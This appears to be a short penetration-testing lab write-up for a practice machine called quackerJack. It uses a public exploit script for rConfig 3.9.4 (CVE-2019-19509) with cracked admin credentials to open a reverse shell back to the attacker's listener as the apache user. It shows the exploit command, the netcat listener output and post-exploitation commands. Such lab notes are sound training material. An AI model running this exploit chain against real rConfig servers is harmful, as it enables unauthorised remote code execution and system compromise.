CVE-2019-19509
The target rConfig instance is vulnerable to CVE-2019-19509 due to its outdated version; 3.9.4
The credential hash of the admin user has been exfiltrated via SQL injection and cracked; admin:abgrtyu
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/quackerJack/exploits-rconfig]
└─$ python3 rconfig_CVE-2019-19509.py https://$IP:8081 admin abgrtyu $tun0 8081
rconfig - CVE-2019-19509 - Web authenticated RCE
[+] Logged in successfully, triggering the payload...
[+] Check your listener !Executing the exploit script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/quackerJack/exploits-rconfig]
└─$ nnc 8081
listening on [any] 8081 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.144.57] 48018
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
bash-4.2$ hostname
hostname
quackerjack
bash-4.2$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:35:f1 brd ff:ff:ff:ff:ff:ff
inet 192.168.144.57/24 brd 192.168.144.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the apache account via exploiting CVE-2019-19509